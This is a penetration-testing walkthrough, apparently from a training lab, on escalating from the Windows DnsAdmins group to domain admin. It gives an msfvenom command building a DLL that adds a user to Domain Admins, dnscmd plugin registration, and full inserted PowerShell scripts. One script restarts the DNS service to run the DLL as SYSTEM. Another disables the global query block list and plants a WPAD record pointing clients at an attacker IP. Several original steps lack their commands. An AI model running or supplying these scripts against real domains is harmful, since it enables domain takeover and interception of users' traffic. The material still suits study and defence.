DnsAdmins

Members of the DnsAdmins group have administrative access to the DNS server: they can manage zones, records and server configuration. The Windows DNS service runs as SYSTEM and supports custom plugins (.dll); it calls functions exported by the plugin to resolve name queries that are outside the scope of any locally hosted DNS zone.

If we are members of DnsAdmins we can leverage the plugin mechanism for privilege escalation: a DLL we register is loaded into the DNS service and runs with its privileges, which on a Domain Controller means SYSTEM on the DC.

Attack 1: DNS service is running on Domain Controller

Overview of the attack. See this blog post for more details => https://adsecurity.org/?p=4064

  • DNS management is performed over RPC

  • The ServerLevelPluginDll setting allows us to load a custom DLL with zero verification of the DLL's path. It can be set with the dnscmd tool from the command line.

  • When a member of the DnsAdmins group runs the dnscmd command below, the ServerLevelPluginDll value under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\DNS\Parameters is populated with the path.

  • When the DNS service is restarted, the DLL at this path is loaded. The path can be local to the DC or a UNC path to a network share that the Domain Controller's machine account can read.

  • An attacker can load a custom DLL to obtain a reverse shell or even load a tool such as Mimikatz as a DLL to dump credentials.

First we generate a malicious plugin DLL with msfvenom that adds our user to the Domain Admins group. Replace <USER> with your username.

msfvenom -p windows/x64/exec cmd='net group "domain admins" <USER> /add /domain' -f dll -o adduser.dll

Next we transfer it to the DC and register it with the DNS service (the path must be readable by the DNS server when it starts):

dnscmd.exe /config /serverlevelplugindll C:\Users\netadm\Desktop\adduser.dll

Then we must restart the DNS service. Members of DnsAdmins can't do this by default, so we may have to wait for the service to be restarted (for example by a reboot) or find another way to restart it.

To check whether we have restart permissions, we first get the SID of our user:

Then we check the DACL of the DNS service:

If the DACL contains an access-allowed ACE for our SID (an entry of the form (A;;<rights>;;;<SID>) in the SDDL string) that grants both start and stop rights, we can restart the service. Service rights are written as two-letter codes in SDDL:

  • S-1-5-21-669053619-2741956077-1013132368-1109 is our SID (the last field of the ACE)

  • RP: Start (SERVICE_START)

  • WP: Stop (SERVICE_STOP)

  • DT: Pause or Continue (SERVICE_PAUSE_CONTINUE)

  • CC: Query configuration (SERVICE_QUERY_CONFIG); DC: Change configuration (SERVICE_CHANGE_CONFIG)

We need both RP and WP on the service to stop and start it.

We restart the service.

Do it from cmd.exe, not PowerShell (it didn't work from PowerShell; note that in PowerShell a bare sc is an alias for Set-Content, so sc stop dns does not call the service control tool unless you write sc.exe).

We can confirm we are now members of domain admins:

Afterwards we must log out and log back in to get a new access token that includes the Domain Admins group; the existing token does not pick up the new membership.
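The complete Attack 1 procedure after the DLL has been copied to the DC, as an added example that is not part of the original page: register the plugin, confirm the registry value, parse the service DACL for our own SID's start/stop rights, restart the service and verify the group change. The DLL path, the service name DNS (the real service name of the DNS Server role) and the group name are assumptions; sc.exe is called with its .exe suffix so the PowerShell sc alias does not get in the way.

```powershell
# Added example (not from the original page). Run as a DnsAdmins member on the DNS server.
$dll = 'C:\Users\netadm\Desktop\adduser.dll'   # assumed path of the msfvenom DLL on the DC

# 1. Register the plugin. dnscmd talks to the DNS server over RPC, which is why a
#    DnsAdmins member who is not a local admin of the DC can set this.
dnscmd.exe /config /serverlevelplugindll $dll

# 2. Confirm the value the DNS server reads at start-up was written.
$key = 'HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters'
(Get-ItemProperty -Path $key -Name ServerLevelPluginDll).ServerLevelPluginDll

# 3. Work out which service rights our token has on the DNS service.
#    sc.exe sdshow prints the DACL as SDDL: a sequence of ACEs (A;;<rights>;;;<SID>).
$me     = [System.Security.Principal.WindowsIdentity]::GetCurrent()
$mySids = @($me.User.Value) + ($me.Groups | ForEach-Object { $_.Value })
$sddl   = (sc.exe sdshow DNS) -join ''

# Service access rights as spelled in SDDL:
#   CC SERVICE_QUERY_CONFIG    DC SERVICE_CHANGE_CONFIG   LC SERVICE_QUERY_STATUS
#   SW SERVICE_ENUMERATE_DEPS  RP SERVICE_START           WP SERVICE_STOP
#   DT SERVICE_PAUSE_CONTINUE  LO SERVICE_INTERROGATE     CR SERVICE_USER_DEFINED_CONTROL
$rights = @()
foreach ($ace in [regex]::Matches($sddl, '\(A;;([A-Z]*);;;([^)]+)\)')) {
    # Well-known SIDs are abbreviated (SY, BA, IU, ...) and are not expanded here;
    # only explicit S-1-5-... entries for our user or our groups are matched.
    if ($mySids -contains $ace.Groups[2].Value) {
        $rights += [regex]::Matches($ace.Groups[1].Value, '..') | ForEach-Object { $_.Value }
    }
}
$canStart = $rights -contains 'RP'
$canStop  = $rights -contains 'WP'
"Rights on DNS: $($rights -join ' ')  start=$canStart stop=$canStop"

# 4. Restart the service so the plugin DLL is loaded. The DLL's entry point runs as
#    SYSTEM inside dns.exe and executes the "net group ... /add" payload.
if ($canStop -and $canStart) {
    sc.exe stop DNS | Out-Null
    while ((Get-Service -Name DNS).Status -ne 'Stopped') { Start-Sleep -Seconds 1 }
    sc.exe start DNS | Out-Null
} else {
    Write-Warning 'No SERVICE_STOP/SERVICE_START on DNS: wait for a restart or a reboot.'
}

# 5. Verify. The new membership only appears in a fresh token, so log off and on afterwards.
net group "Domain Admins" /domain
```

The DACL check only matches ACEs that name our SID or one of our group SIDs explicitly; if our rights come from a well-known principal such as BA (Administrators) the abbreviation would have to be mapped first.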

Attack 2: Mimilib.dll

As detailed in this post, we could also use mimilib.dll from the creator of the Mimikatz tool to gain command execution: its kdns.c file implements the DNS plugin interface, and it can be modified to execute a reverse shell one-liner or another command of our choosing. The resulting DLL is registered and loaded exactly as in Attack 1, via ServerLevelPluginDll and a service restart.

Attack 3: Creating a WPAD Record

A WPAD (Web Proxy Auto-Discovery) record is a DNS or DHCP configuration that allows client computers on a network to automatically discover the URL of a PAC (Proxy Auto-Configuration) file.

DNS servers keep "wpad" and "isatap" in a global query block list so that such a record is not answered even if it exists. After disabling the global query block list and creating a WPAD record, every machine that runs WPAD with default settings (automatic proxy detection, which is the Windows default) will look up wpad.<domain>, fetch http://wpad.<domain>/wpad.dat from our attack machine and, if we serve a PAC file there, have its web traffic proxied through us.

First we disable the global query block list:

Then we add our WPAD entry to proxy all traffic to us:

In both commands make sure to replace dc01.inlanefreight.local with the DNS server address and 10.10.14.3 with your attacking IP.
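The two dnscmd steps, their DnsServer-module equivalents and a resolution check, as an added example that is not part of the original page. The server dc01.inlanefreight.local, the zone inlanefreight.local and the attacker address 10.10.14.3 are taken over from the placeholders above and are assumptions.

```powershell
# Added example (not from the original page). Run as a DnsAdmins member.
$dnsServer = 'dc01.inlanefreight.local'   # assumed DNS server (usually the DC)
$zone      = 'inlanefreight.local'        # assumed zone the clients search
$attacker  = '10.10.14.3'                 # assumed attacker IP

# Show the current block list, then clear it: /globalqueryblocklist with no
# names sets an empty list (alternatively /enableglobalqueryblocklist 0).
dnscmd $dnsServer /info /globalqueryblocklist
dnscmd $dnsServer /config /globalqueryblocklist

# Create the A record. DnsAdmins members can add records to any zone on the server.
dnscmd $dnsServer /recordadd $zone wpad A $attacker

# The same two steps with the DnsServer module (RSAT DNS tools), for reference:
#   Set-DnsServerGlobalQueryBlockList -Enable $false -ComputerName $dnsServer
#   Add-DnsServerResourceRecordA -ZoneName $zone -Name wpad -IPv4Address $attacker -ComputerName $dnsServer

# Verify that the server now answers for wpad; with the block list enabled it would not.
$answer = Resolve-DnsName -Name "wpad.$zone" -Type A -Server $dnsServer -ErrorAction Stop
if ($answer.IPAddress -contains $attacker) {
    "wpad.$zone resolves to $attacker; clients will request http://wpad.$zone/wpad.dat from us"
}
```

The record only points clients at us; something on the attack machine must answer http://wpad.inlanefreight.local/wpad.dat with a PAC file that names our proxy (Responder's -w option serves one), otherwise clients simply fall back to a direct connection.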
